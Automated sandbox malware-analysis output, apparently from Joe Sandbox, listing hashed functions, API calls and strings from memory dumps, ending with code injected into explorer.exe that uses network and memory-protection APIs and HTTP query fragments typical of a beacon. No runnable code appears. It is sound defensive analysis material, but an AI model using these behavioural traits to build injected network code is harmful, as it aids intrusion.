Opcode Fuzzy Hash: e6f7886be31dcc33ad86562b454bf312e415d0a6fa3836e2035fe6b92f50d18b
Instruction Fuzzy Hash: E39002A160550502D1407158541870A011997E0205F55D012A4024555DC7698B5567A2

Uniqueness

Uniqueness Score: -1.00%

Function 01452CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff938547d57cf9d2845e724aa5971ff0b25824e626b75828507eaf5323abc0a6
Instruction ID: e4cfd4c9243ba0dacd39db83cd5180f6f3cb0b9b8344ef094ed5880fcb347883
Opcode Fuzzy Hash: ff938547d57cf9d2845e724aa5971ff0b25824e626b75828507eaf5323abc0a6
Instruction Fuzzy Hash: 249002B120150503D1007158550870B010997E0205F55D412A4424559DD76689516222

Uniqueness

Uniqueness Score: -1.00%

Function 01452F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 059063d7737fa54d291e700f798b24164a5488cb09107604d9b2d76a57c41806
Instruction ID: 90ce1c5b4998862b09a8d6dcc8af7e7632c6a660ff88c213ae89060eab408c66
Opcode Fuzzy Hash: 059063d7737fa54d291e700f798b24164a5488cb09107604d9b2d76a57c41806
Instruction Fuzzy Hash: AB9002E121150142D1047158440470A014997F1205F55C013A6154555CC6398D615226

Uniqueness

Uniqueness Score: -1.00%

Function 01452FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db8c6016d70946a43cb009666f9c72c2643d81e0266efe60b4df105bef88d0ff
Instruction ID: bfe32f4382fe577be9a5b17f575f8800d10bf4b307bb6cb617480f6d61d0cbbf
Opcode Fuzzy Hash: db8c6016d70946a43cb009666f9c72c2643d81e0266efe60b4df105bef88d0ff
Instruction Fuzzy Hash: A99002B120190502D1007158480874B010997E0306F55C012A9164556EC775C9916632

Uniqueness

Uniqueness Score: -1.00%

Function 01452E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be77bd3b3a71ebe2813a2406dadcc5057da1c527495f52f74d7d8dfeeee4c5f
Instruction ID: 064df9f1db24e828cf7bd3b572c6c1d3746d95c1c52fa33ada5e8f7632a6463e
Opcode Fuzzy Hash: 3be77bd3b3a71ebe2813a2406dadcc5057da1c527495f52f74d7d8dfeeee4c5f
Instruction Fuzzy Hash: AB9002A130150502D1027158441460A010DD7E1349F95C013E5424556DC7358A53A233

Uniqueness

Uniqueness Score: -1.00%

Function 01452EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c7875478f6ac2106f1b14b3d455752c6cb96ace57d367fcb039a7d89129b493
Instruction ID: 03ead0630476b3e89cb8b5dd6d64f60ca1676197fb52fa81cc968c5ee9e40248
Opcode Fuzzy Hash: 8c7875478f6ac2106f1b14b3d455752c6cb96ace57d367fcb039a7d89129b493
Instruction Fuzzy Hash: 999002E120190503D1407558480460B010997E0306F55C012A6064556ECB398D516236

Uniqueness

Uniqueness Score: -1.00%

Function 01453010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da7859f9ff911846c1f617b5bf5ec9db94229862f2271a74e03824918e55c463
Instruction ID: f0d1394a56c526bf98334d95ab72c5d25fe1cd34d3459dd3483fd0e56b554f06
Opcode Fuzzy Hash: da7859f9ff911846c1f617b5bf5ec9db94229862f2271a74e03824918e55c463
Instruction Fuzzy Hash: 619002A120194542D14072584804B0F420997F1206F95C01AA8156555CCA2589555722

Uniqueness

Uniqueness Score: -1.00%

Function 01453090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e6c9fb340967c3db293ce2512d62c7455548b66ca1f830e50ab3b907fc75d8
Instruction ID: 5bb388a7d2cb321052fd5d69bd3610126121557108c23642d36f6164e2c02bac
Opcode Fuzzy Hash: 37e6c9fb340967c3db293ce2512d62c7455548b66ca1f830e50ab3b907fc75d8
Instruction Fuzzy Hash: 509002A124150902D1407158841470B010AD7E0605F55C012A4024555DC7268A6567B2

Uniqueness

Uniqueness Score: -1.00%

Function 014535C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa04dfdf537a1659b0faae2f2893374d2cf7f4ba56f42dd85fba72dbeb256b46
Instruction ID: 0942d6edea510284d8d7094049b8d213bb93496acc2206cf86893c59d787cb90
Opcode Fuzzy Hash: fa04dfdf537a1659b0faae2f2893374d2cf7f4ba56f42dd85fba72dbeb256b46
Instruction Fuzzy Hash: 979002B160560502D1007158451470A110997E0205F65C412A4424569DC7A58A5166A3

Uniqueness

Uniqueness Score: -1.00%

Function 014539B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c23232f7ba703ca34bcd622bb389efecdd26c5c544e18aff1533aa6a71942577
Instruction ID: 195fedb14019c50e2997a568fcf466866ed87436b324590a77cfea20a6de6402
Opcode Fuzzy Hash: c23232f7ba703ca34bcd622bb389efecdd26c5c544e18aff1533aa6a71942577
Instruction Fuzzy Hash: 129002A124555202D150715C440461A4109B7F0205F55C022A4814595DC66589556322

Uniqueness

Uniqueness Score: -1.00%

Function 01453D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6159a4ac4f11ebc165e85a6929c868a72d678534770e82e910047cbc8d053c24
Instruction ID: 5650f5e52a070ec782e272cde586239361eaa4968185720ee51888c4670feef6
Opcode Fuzzy Hash: 6159a4ac4f11ebc165e85a6929c868a72d678534770e82e910047cbc8d053c24
Instruction Fuzzy Hash: DE9002B520150502D5107158580464A014A97E0305F55D412A4424559DC76489A1A222

Uniqueness

Uniqueness Score: -1.00%

Function 01453D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d03e634e12686cfc1576619ae4b966c3a6c85b6ff26886a57b0cb1b9112f6596
Instruction ID: 83862b172482796285d3a0cd6e7d3adb4187a5ee30ff3778e737b266ff1dee9a
Opcode Fuzzy Hash: d03e634e12686cfc1576619ae4b966c3a6c85b6ff26886a57b0cb1b9112f6596
Instruction Fuzzy Hash: 129002B120250242954072585804A4E420997F1306B95D416A4015555CCA2489615322

Uniqueness

Uniqueness Score: -1.00%

Function 01452C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: edd72e14b954ea6981e0968d8ad4e7ad4bfb3d7dc2907726650e9a559adf4eea
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01452890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0145293C
___swprintf_l.LIBCMT ref: 0145295E
___swprintf_l.LIBCMT ref: 014529A3
___swprintf_l.LIBCMT ref: 0148A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 0148A54E
ffff:, xrefs: 0148A504
::%hs%u.%u.%u.%u, xrefs: 0148A527
:%u.%u.%u.%u, xrefs: 0148A5B8

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 0aa8ece54bceae78b9bef48d26a1aa69e066645d8593dae2f5258cae25f02660
Instruction ID: 5b8e4ae5fc4f2d5e7c0b785f7fd161069bfccb5786d79225ab637780973052c5
Opcode Fuzzy Hash: 0aa8ece54bceae78b9bef48d26a1aa69e066645d8593dae2f5258cae25f02660
Instruction Fuzzy Hash: A351F6B6A00116BFCB51DF9D888097FFBB8BB08244714822BE865D7752D3B4DE4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 014C2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 014C24A6
___swprintf_l.LIBCMT ref: 014C24E2
___swprintf_l.LIBCMT ref: 014C257D
___swprintf_l.LIBCMT ref: 014C25A3
___swprintf_l.LIBCMT ref: 014C25C8
___swprintf_l.LIBCMT ref: 014C2608

Strings

ffff:, xrefs: 014C247D, 014C249D
::ffff:0:%u.%u.%u.%u, xrefs: 014C24DA
::%hs%u.%u.%u.%u, xrefs: 014C249E
:%u.%u.%u.%u, xrefs: 014C25FF

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 4540c7028ee879827932c2c348356f68d6264b071470409a84bf7a7abe25571a
Instruction ID: 3c4e512e10f1405174f334e23d8f252a6c06e8fe4caff73085122471444e9cef
Opcode Fuzzy Hash: 4540c7028ee879827932c2c348356f68d6264b071470409a84bf7a7abe25571a
Instruction Fuzzy Hash: E4510479A00645AFCB61DE5DC990C7FFBF8AB54604B04846FE496D3691E6F4DA008760

Uniqueness

Uniqueness Score: -1.00%

Function 01447630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014846FC
CLIENT(ntdll): Processing section info %ws..., xrefs: 01484787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01484742
ExecuteOptions, xrefs: 014846A0
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01484725
Execute=1, xrefs: 01484713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01484655

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 60680651559314cb69712c55cb6f7f96f2658f382439f7aac3b3fcb12f02e6f9
Instruction ID: 1395c69ce9e9ef574d59f8ab2e4d35db712f074fad7e09e11dbdf1068bf3ded6
Opcode Fuzzy Hash: 60680651559314cb69712c55cb6f7f96f2658f382439f7aac3b3fcb12f02e6f9
Instruction Fuzzy Hash: B9512F3160021AABFF11EB99DC45FBE7BB9EF24315F04009FD609A72A1D7719A468F50

Uniqueness

Uniqueness Score: -1.00%

Function 014E6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: ea97940b3293b1c126416d8e9722e4ab2ab529ede6767b331d5f74a781ee40de
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: B2023670508342AFD705CF19C498A6FBBE5EFE8711F41892EF9894B265DB31E905CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0145B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0145B6BF

Strings

+, xrefs: 0145B65A
0, xrefs: 0145B66F
0, xrefs: 0145B695
-, xrefs: 0145B650

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 0154d6d731da617b66861c25cc1a1dde4d17027a2e4274b541c017ad54fef975
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 89819F70E052499EEF658E6CC8917BEBBA3EF45320F18415BDC65A73A3C7349841CB61

Uniqueness

Uniqueness Score: -1.00%

Function 014C20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 014C214F
___swprintf_l.LIBCMT ref: 014C2172

Strings

%%%u, xrefs: 014C2146
]:%u, xrefs: 014C2169
[, xrefs: 014C212B

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 09f9a7000ba29bd736ed0d731a6d8883135c31045f4ffa53a1cb2fd7cef8b0f9
Instruction ID: 89225731e0003ef8230b01d0e6975ab34bfb43fc61984bcaf6561f894f77349d
Opcode Fuzzy Hash: 09f9a7000ba29bd736ed0d731a6d8883135c31045f4ffa53a1cb2fd7cef8b0f9
Instruction Fuzzy Hash: A721537AA00119ABDB51DF6AD840EFF7BF8EF94A44F04012BE905D3255EBB0D9018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0143F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014802BD
RTL: Re-Waiting, xrefs: 0148031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014802E7

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 0000d175edb42f4126f7820857bf1ac36daf83d4ea36a3fc2bdb051c39165868
Instruction ID: 5f7ca239325164cc8d78ecfb7ed78c7311ef31b1de3657c9377aafd706f6f583
Opcode Fuzzy Hash: 0000d175edb42f4126f7820857bf1ac36daf83d4ea36a3fc2bdb051c39165868
Instruction Fuzzy Hash: 6CE18E30A147419FD726DF28C884B2ABBE0BB98314F140A5EF5A58B3F1D775D949CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0144BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 01487B8E
RTL: Re-Waiting, xrefs: 01487BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01487B7F

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: ba63b76a4e629f801cb85f0c110c2f68bf4bed0168110e618c315f0c5dd3aa35
Instruction ID: 407e436e4e0e34ad2554ec849aff80421f04e8ed0e521b214d959e18624e14b8
Opcode Fuzzy Hash: ba63b76a4e629f801cb85f0c110c2f68bf4bed0168110e618c315f0c5dd3aa35
Instruction Fuzzy Hash: CD4105313007029FE720DE29C850B6BB7E5EF98715F100A1EFA5AD77A0DB31E8058B91

Uniqueness

Uniqueness Score: -1.00%

Function 0144B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0148728C

Strings

RTL: Resource at %p, xrefs: 014872A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01487294
RTL: Re-Waiting, xrefs: 014872C1

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: d4e91475c8b342255cc9968d6768398e224cd87f14a2156d8e69e6fa4532d1ff
Instruction ID: 6e44115d4c95ee430323fc3419f9d5e1c0f2842a98d277bf3b37cea427bcaacc
Opcode Fuzzy Hash: d4e91475c8b342255cc9968d6768398e224cd87f14a2156d8e69e6fa4532d1ff
Instruction Fuzzy Hash: 5D411431600202ABE710DF29CC41B6ABBA5FB64715F20061EF955DB760DB31F842C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 014C2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 014C238D
___swprintf_l.LIBCMT ref: 014C23B3

Strings

%%%u, xrefs: 014C2384
]:%u, xrefs: 014C23AA

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: cc1307f89b7a4194c8d2da3a2a1d84b17921c8f1f600b53c2f85f8f6c742a1b6
Instruction ID: ec14680f7bd66f18a72b1f883168f21097c1490e45cfd9fe5f78d832fcb4ee03
Opcode Fuzzy Hash: cc1307f89b7a4194c8d2da3a2a1d84b17921c8f1f600b53c2f85f8f6c742a1b6
Instruction Fuzzy Hash: 18318476A002199FDB61DE39CC40FEFB7F8EB54610F54059FE949E3260EB709A448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01457D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01457E8B

Strings

+, xrefs: 01457DE8
-, xrefs: 01457DDD

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: adbe3334a3e7a2628b42210f38525c7f6514356d9f163a11b45f20c3e63dd390
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: D191C571E002069BEFA4DF6EC8906BFBBA5AF44722F94452BED55A73E2D73089418710

Uniqueness

Uniqueness Score: -1.00%

Function 01419126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01419175
$, xrefs: 01419191

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: d5550a08835e897c9e7bce8f95e152631361a75a91d6740d5f705282c88fcd8f
Instruction ID: 72f38f03babd7d9b18a4eef076dbee068e144a983328d5f1fee1d66296062006
Opcode Fuzzy Hash: d5550a08835e897c9e7bce8f95e152631361a75a91d6740d5f705282c88fcd8f
Instruction Fuzzy Hash: 96812871D002699BDB35CF54CC44BEABBB8AB18754F0441EBEA19B7290D7709E85CFA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 2580, Parent PID: 7420COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	444
Total number of Limit Nodes:	15

Executed Functions

Function 0E5D8F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0E5D912E
setsockopt.WS2_32 ref: 0E5D9830
recv.WS2_32 ref: 0E5D9859

Strings

GET , xrefs: 0E5D9318
nnec, xrefs: 0E5D932A
dat=, xrefs: 0E5D9290
&sql, xrefs: 0E5D9471
&br=, xrefs: 0E5D9509
tion, xrefs: 0E5D9331
: cl, xrefs: 0E5D9338
&un=, xrefs: 0E5D94F1
ose, xrefs: 0E5D933F
Co, xrefs: 0E5D9323

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 55189791489ebff11fa7f22e576c9a0da314512d1a2ce71461d626a20de3825d
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: CB527130618A498BCB69EF6CC4947EAB7E1FB94300F544E2EC59FC7146EE70A949C781

Uniqueness

Uniqueness Score: -1.00%

Function 0E5D8232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 0E5D8449

Strings

`, xrefs: 0E5D841D

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 5f4f98ff150f6b3b286c6058dab4573e522907fc218e9f3661a50d6a159fa173
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 3F222970A18E099FCB6DDF6CC8956AAB7E1FB98301F404A2ED45ED3250DB30E855CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0E5D9E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0E5D9E67

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 77c330842fdb7f31467eb33d4b446a18e9005b3d04af1ce0901282c6a2e93fcc
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: BC019E34628B484F8B88EFAC948022AB7E4FBC9214F000B3EA99AC3250EB60C9414742

Uniqueness

Uniqueness Score: -1.00%

Function 0E5D9E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0E5D9E67

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 8a70b188782b5d109075046d9d9ae8c1f06dd14d89bc5f5e18cf1fab4f8f06eb
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 7601A23462CB884B8B48EB6C94412A6B3E5FBCE314F000B3EE9DAC3240DB61D9064782

Uniqueness

Uniqueness Score: -1.00%

Function 0E5D38C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0E5D39A0

Strings

nt: , xrefs: 0E5D391E
